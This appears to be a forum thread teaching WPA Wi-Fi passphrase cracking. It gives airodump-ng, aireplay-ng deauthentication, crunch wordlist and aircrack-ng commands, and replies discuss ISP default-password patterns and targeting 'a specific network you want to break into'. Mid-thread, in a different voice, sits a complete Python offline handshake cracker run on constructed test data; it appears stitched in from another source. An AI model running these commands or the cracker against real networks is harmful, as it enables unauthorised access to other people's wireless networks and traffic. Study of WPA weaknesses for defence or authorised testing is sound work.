airodump-ng mon0

Now in order to get a handshake file (what we will be cracking) you need to have a client that is connected to the access point you want to attack. airodump will let you know this.

4. Copy down the AP MAC, the client MAC, and the channel number. After you've copied that you can close the other windows.

5. In a new terminal window type in:

aireplay-ng --deauth 1 -a {APMAC} -c {CLIENTMAC} mon0

After you do that, airodump should now say you have the handshake. That's it, you're done with getting the handshake; now it's time for the long part, cracking the handshake. Your time will depend on your computer and your wordlist. In this example I was attacking a 2WIREXXX network that in most cases uses a default 10 digit passcode. You can run this command to create a wordlist file for you in BackTrack (for that specific wordlist):

/pentest/passwords/crunch/crunch 10 10 0123456789 -o /pentest/passwords/wordlists/2wirewl.txt

IF YOU RUN THAT CRUNCH COMMAND, BE PREPARED: IT'S A 35.7GB FILE!

After that, it's your choice what you want to do. You can either continue cracking it on BackTrack (you can use pyrit, aircrack-ng, cowpatty, etc.), or you can even use Windows with an application like Elcomsoft Wireless Security Auditor. For aircrack-ng run the following command:

aircrack-ng {CAPTUREFILE}-01.cap -w /pentest/passwords/wordlists/2wirewl.txt

Just a quick run through. It's easy, but it's the cracking that will take a while. Hope they have WPS; if they do, that becomes much easier. There are also several wordlists available. You can use whatever wordlist you want. Also, as long as you have the capture file, you can crack it on any system. You'll want a system with a lot of processing power, RAM, and a supported graphics card to get upwards of 1500+ k/s (keys per second) [for example my laptop is averaging 300k/s, total crap, and will never finish].

Enjoy WPA cracking!

-TRAiN3R
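What the steps above actually exploit, as an added example that is not TRAiN3R's code and not aircrack-ng's: the captured 4-way handshake (message 2 carries the client's SNonce and a MIC; message 1 carries the AP's ANonce) gives everything needed to test passphrases offline. For each candidate: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds), PTK = PRF-512(PMK, both MACs, both nonces), KCK = first 16 bytes of the PTK, and the candidate is correct when HMAC(KCK, EAPOL frame) reproduces the captured MIC. The SSID, MACs, nonces and passphrase below are constructed test data (the handshake is built with the true passphrase instead of being read from a .cap file); the 4096 PBKDF2 rounds are also why keys/second is so low.

```python
import hashlib
import hmac
import time
from typing import Dict, Iterable, Optional, Tuple

# Offsets inside an EAPOL-Key frame (4-byte 802.1X header + key descriptor):
# 0 version, 1 type, 2-3 length, 4 descriptor type, 5-6 key info, 7-8 key length,
# 9-16 replay counter, 17-48 nonce, 49-64 IV, 65-72 RSC, 73-80 ID, 81-96 MIC,
# 97-98 key data length, 99.. key data
MIC_OFFSET = 81
MIC_LEN = 16


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: expand the PMK with both MACs and both nonces into the 64-byte PTK.
    All four inputs are visible in the capture, which is what makes the attack offline."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):  # 4 x 20-byte SHA-1 outputs, truncated to 64 bytes
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol: bytes, key_version: int) -> bytes:
    """MIC over the EAPOL-Key frame with its own MIC field zeroed.
    Key descriptor version 1 (WPA/TKIP) uses HMAC-MD5, version 2 (WPA2/CCMP) HMAC-SHA1;
    both truncated to 16 bytes. Version 3 (AES-CMAC) is not handled here."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * MIC_LEN + eapol[MIC_OFFSET + MIC_LEN:]
    digest = hashlib.md5 if key_version == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, digest).digest()[:MIC_LEN]


def build_handshake(passphrase: str, ssid: str, ap_mac: bytes, client_mac: bytes,
                    anonce: bytes, snonce: bytes, key_version: int = 2) -> Dict:
    """Constructed stand-in for what airodump-ng captures: message 2 of the 4-way
    handshake (client -> AP), MIC'd with the real PMK. Not a real capture."""
    key_info = (0x0108 | key_version).to_bytes(2, "big")  # MIC bit + pairwise bit + version
    body = (b"\x02" + key_info + b"\x00\x10" + b"\x00" * 7 + b"\x01" + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * MIC_LEN + b"\x00\x00")
    eapol = b"\x01\x03" + len(body).to_bytes(2, "big") + body
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, client_mac, anonce, snonce)[:16]
    mic = eapol_mic(kck, eapol, key_version)
    eapol = eapol[:MIC_OFFSET] + mic + eapol[MIC_OFFSET + MIC_LEN:]
    return {"ssid": ssid, "ap_mac": ap_mac, "client_mac": client_mac, "anonce": anonce,
            "snonce": snonce, "eapol": eapol, "key_version": key_version}


def crack(handshake: Dict, wordlist: Iterable[str]) -> Tuple[Optional[str], int]:
    """Offline dictionary attack (what aircrack-ng -w does): derive PMK -> PTK -> KCK per
    candidate and compare the recomputed MIC with the captured one.
    Returns (passphrase, candidates tried) or (None, candidates tried)."""
    h = handshake
    captured_mic = h["eapol"][MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    tried = 0
    for candidate in wordlist:
        tried += 1
        pmk = pmk_from_passphrase(candidate, h["ssid"])
        kck = derive_ptk(pmk, h["ap_mac"], h["client_mac"], h["anonce"], h["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, h["eapol"], h["key_version"]), captured_mic):
            return candidate, tried
    return None, tried


if __name__ == "__main__":
    # Constructed test data: placeholder MACs, fixed nonces, a 2WIRE-style 10-digit passphrase.
    ap, sta = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    hs = build_handshake("4186920371", "2WIRE123", ap, sta, bytes(range(32)), bytes(range(32, 64)))
    # A slice of the space "crunch 10 10 0123456789" would enumerate, in the same order.
    candidates = (f"{n:010d}" for n in range(4186920300, 4186920400))
    start = time.perf_counter()
    found, tried = crack(hs, candidates)
    rate = tried / (time.perf_counter() - start)
    print(f"found={found} after {tried} candidates, ~{rate:.0f} keys/s on this CPU")
```

The keys/second figure this prints is the same quantity the post quotes for aircrack-ng: at that rate the full 10^10 digit space is hours on a fast GPU and months on a laptop, so a wordlist shaped to the target's default scheme matters more than raw hardware.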


If you have a specific network you want to break into, I would recommend setting the monitor interface to the specific channel, and I would not use airmon-ng for that task (had some problems in the past with it; for example your mon interface stays until the next reboot). I would just use the Linux commands to set my wifi card in monitor mode on a specific channel.

I always use that set of commands instead of airmon. I believe it's because airmon couldn't activate monitor mode if another process was using the network interface (like dhclient, etc...).

@OP: Don't take me the wrong way, but I think you should explain what each command does. Otherwise every newbie who follows the tutorial will know how to perform the attack, but won't have the knowledge of how and why it works. Just my 2 cents.


Bruteforcing WPA, especially with only a CPU, is just plain retarded. This will take months or even years to finish even with the latest CPUs on the market. Even with very heavy GPUs bruteforcing could take a week or more. The only viable attack would be a dictionary one.


« Last Edit: Yesterday at 09:34:29 am by Kulverstukas »
« Last Edit: Today at 13:37:00 am by ande »


Quote from: TRAiN3R

After that, its your choice with what you want to do. You can either continue cracking it on backtrack, you can use pyrit, aircrack-ng, cowpatty, etc. You can even use windows with an application like elcomsoft wireless security auditor.

Hrm as far as I know pyrit AND Elcomsoft Wireless Security Auditor both utilize GPU cores. And of course the bigger the dictionary, the longer it would take. Your words of circles make no sense.

Also TRAiN3R even hints at the fact that you will want a good system:

Quote from: TRAiN3R

You'll want a system with alot of processing power, ram, and a supported graphics card to get upwards of 1500+ k/s (keys per second) [for example my laptop is averaging 300k/s total crap and will never finish]

Bruteforcing, aka random characters, is not viable for WPA and WPA2. This cannot really be considered a dictionary attack. That's what I was pointing out. Even with a massive cloud this could take years.

So yeah, that's what I was saying.

Well, on my laptop I can crack about 8000 PMKs. Which is cute. With some proper ATI cards X00,000 PMKs is not uncommon. Some good dictionaries help out. However, where I live most people appear to just leave it at the default. Which is bad for me.

« Last Edit: December 17, 2012, 04:09:15 pm by proxx »



Well, the new default ISPs are using phone numbers now, so you can create a smaller wordlist using your area code then the other digits, so they are much smaller files. You can even narrow it down further, as areas tend to use the same prefixes. And yes, 10000+ can be common on good systems. Also, a wordlist = dictionary.

Well, not where I live, unfortunately. Just pseudo-randomly generated strings. However, a certain very common ISP uses a random string of upper case letters which is 8 characters long. 26^8 is still nasty to crack and even with really good GPUs can take several weeks if not months.


Very true. All the big ISPs in my area are using phone numbers, which makes for a quick crack: a passthrough with pyrit (or make an output file to use Elcomsoft on my Win machine).